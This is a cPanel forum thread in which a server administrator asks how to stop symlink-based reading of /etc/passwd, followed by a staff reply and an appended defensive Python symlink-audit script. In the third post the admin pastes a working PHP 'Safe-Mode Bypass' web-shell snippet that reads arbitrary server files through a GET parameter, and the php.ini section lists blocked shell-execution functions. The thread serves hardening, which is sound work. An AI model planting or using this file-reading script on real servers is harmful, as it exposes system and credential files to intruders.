
Best way to secure server from symlinks?

Discussion in 'Security' started by The raw, Feb 10, 2017.

  1. The raw

    The raw Registered

    Joined:
    Feb 10, 2017
    Messages:
    4
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Albania
    cPanel Access Level:
    DataCenter Provider
    In some parts I was able to secure my server, in some parts not.

    I can't find a way to block symlinks permanently from my server.
    I have a jailed Apache and hardened kernel, blocked PHP functions, and still I'm able to put a symlink on the host and get info, like everything that is in /etc/passwd,
    but when I turn on mod_security from the user panel I can't read the /etc/passwd file anymore.

    Even if open_basedir is ON I will be able to read the /etc/passwd file!

    Is there any way to disallow clients from turning mod_security off/on?!

    I tried to turn safe_mode on but that crashed everything; only sites with just HTML/CSS designs weren't affected :confused: and on the others I was getting error 505.

    In the old version of cPanel my server was pretty secure, but I can't secure it with the latest version (I didn't do an update; it was a fresh install on a new server).


    Thank you!

    As for info
    Code:
    [root@node1 ~]# cat /etc/redhat-release
    CentOS release 6.8 (Final)
    [root@node1 ~]# cat /var/cpanel/envtype
    standard
    [root@node1 ~]# uname -r
    2.6.32-642.13.1.199.cpanel6.x86_64
    [root@node1 ~]# php -v
    ea-php-cli Copyright 2016 cPanel, Inc.
    PHP 5.6.30 (cgi-fcgi) (built: Jan 25 2017 04:19:44)
    Copyright (c) 1997-2016 The PHP Group
    Zend Engine v2.6.0, Copyright (c) 1998-2016 Zend Technologies
        with the ionCube PHP Loader v4.7.5, Copyright (c) 2002-2014, by ionCube Ltd., and
        with Zend Guard Loader v3.3, Copyright (c) 1998-2014, by Zend Technologies
        with Zend OPcache v7.0.4-dev, Copyright (c) 1999-2015, by Zend Technologies
    
    Code:
    Use Cpanel Jailed by default = ON
    CGIEmail and CGIEcho = OFF
    Enable File Protect = ON
    Blank referrer safety check = ON
    Referrer safety check = ON
    EXPERIMENTAL: Jail Apache Virtual Hosts using mod_ruid2 and cPanel® jailshell. = ON
    open_basedir = ON
    
    cPanel Security Advisor SCAN LOG.
    attached as 1.

    Apache conf. for "/"
    Code:
    Symlink Protection = ON
    ExecCGI = ON
    FollowSymLinks = ON
    Includes = ON
    IncludesNOEXEC = ON
    Indexes = ON
    MultiViews = ON
    SymLinksIfOwnerMatch = ON
    
    EA4 Profile,
    Code:
    Apache 2.4
    config
    config-runtime
    mod_bwlimited
    mod_cgi
    mod_deflate
    mod_env
    mod_expires
    mod_headers
    mod_heartbeat
    mod_heartmonitor
    mod_mpm_prefork
    mod_proxy
    mod_proxy_fcgi
    mod_proxy_http
    mod_remoteip
    mod_ruid2
    mod_security2
    mod_ssl
    mod_unique_id
    mod_watchdog
    tools
    
    PHP 5.6
    libc-client
    pear
    php
    php-bcmath
    php-bz2
    php-calendar
    php-cli
    php-common
    php-curl
    php-devel
    php-enchant
    php-fileinfo
    php-fpm
    php-ftp
    php-gd
    php-gettext
    php-imap
    php-intl
    php-ioncube
    php-ldap
    php-litespeed
    php-mbstring
    php-mcrypt
    php-mysqlnd
    php-pdo
    php-pgsql
    php-posix
    php-process
    php-pspell
    php-soap
    php-sockets
    php-sourceguardian
    php-tidy
    php-xml
    php-xmlrpc
    php-zendguard
    php-zip
    runtime
    
    On php.ini file
    Code:
    disable_functions = exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source,ini_set
    allow_url_fopen = Off
    allow_url_include = Off 
    
    cPanel CFS Scan.
    Score 137/144 (other stuff is about cloudlinux ssh, nameservers geographically etc.)

    cPanel Version.
    WHM 62.0 [Build 10]

    I've read the docs and did the steps which I have written here, but I'm wrong somewhere or I didn't find everything to fix this problem.

    I hope someone here can tell me where I'm wrong or what I missed! Thanks.
     

    Attached Files:

    • 1.png (File size: 288.3 KB)
  2. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    38,658
    Likes Received:
    1,427
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    It looks like this system is configured to use the Bluehost patch; however, it's not required because you already use the cPanel hardened kernel for symlink protection at the kernel level. You should select Off for the Symlink Protection option in the Global Configuration section of WHM's Apache Configuration interface (Home >> Service Configuration >> Apache Configuration). This will correct the symlink warning message you see in "WHM >> Security Advisor".

    Regarding the ability to view the /etc/passwd data, could you let us know the specific steps you are taking to reproduce that behavior?

    Thank you.
     
  3. The raw

    The raw Registered

    Sure, there's a part of the code which can read it:
    Code:
    <style>
    body {
        background-color: lightblue;
    }
    </style>
    <tr>
      <td width="50%" height="83" valign="top"><center>
        <div align="center">Php Safe-Mode Bypass (Read Files)
        </div><br>
        <form action="<?php echo $surl; ?>">
          <div align="center">
          File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
    
          <?
        
          function rsg_read()
        {  
        $test="";
        $temp=tempnam($test, "cx");
        $file=$_GET['file'];  
        $get=htmlspecialchars($file);
        echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
        if(copy("compress.zlib://".$file, $temp)){
        $fichier = fopen($temp, "r");
        $action = fread($fichier, filesize($temp));
        fclose($fichier);
        $source=htmlspecialchars($action);
        echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
        unlink($temp);
        } else {
        die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
        <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
        access.</CENTER></FONT>");
                }
        echo "</div>";
        }
      
        if(isset($_GET['file']))
    {
    rsg_read();
    }
      
        ?>
      
    
              <br>
          </div>
        </form>
        </td>
    </tr>
    
    The script isn't created by me so I don't know too much about it!
     
  4. The raw

    The raw Registered

    As for now I found a fix for this:
    I added "fopen" to the disabled functions. I don't know if this will cause any problems for websites, but nothing has been reported for now :/
     
    cPanelMichael likes this.
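
An added example, not part of the thread and not cPanel's code: an audit an administrator can run over one account's directory to list the symlinks worth reviewing. It makes the same owner comparison that the `SymLinksIfOwnerMatch` option listed in the first post makes (link owner versus target owner) and also flags links that resolve outside the audited directory. The function name `audit_symlinks` and the reason labels are hypothetical.

```python
import os
from pathlib import Path


def audit_symlinks(home):
    """Return sorted (link, resolved_target, reasons) tuples for symlinks
    under `home` that resolve outside it, differ in owner, or dangle."""
    home = Path(home).resolve()
    findings = []
    # os.walk lists symlinked directories but does not descend into them
    # (followlinks defaults to False), so a link cannot steer the audit
    # out of the account being checked.
    for dirpath, dirnames, filenames in os.walk(home):
        for name in dirnames + filenames:
            link = Path(dirpath) / name
            if not link.is_symlink():
                continue
            reasons = []
            target = Path(os.path.realpath(link))
            if not target.exists():
                reasons.append("dangling")
            elif os.lstat(link).st_uid != os.stat(target).st_uid:
                # Owner of the link itself vs owner of what it points to:
                # the comparison SymLinksIfOwnerMatch performs.
                reasons.append("owner-mismatch")
            if target != home and home not in target.parents:
                reasons.append("outside-home")
            if reasons:
                findings.append((str(link), str(target), reasons))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    # Usage: python audit.py /path/to/account/home  (defaults to ".")
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for link, target, reasons in audit_symlinks(root):
        print(f"{link} -> {target}: {', '.join(reasons)}")
```

A link that another user could have swapped between the audit and a later request is not covered by a point-in-time scan like this; it complements kernel-level symlink protection rather than replacing it.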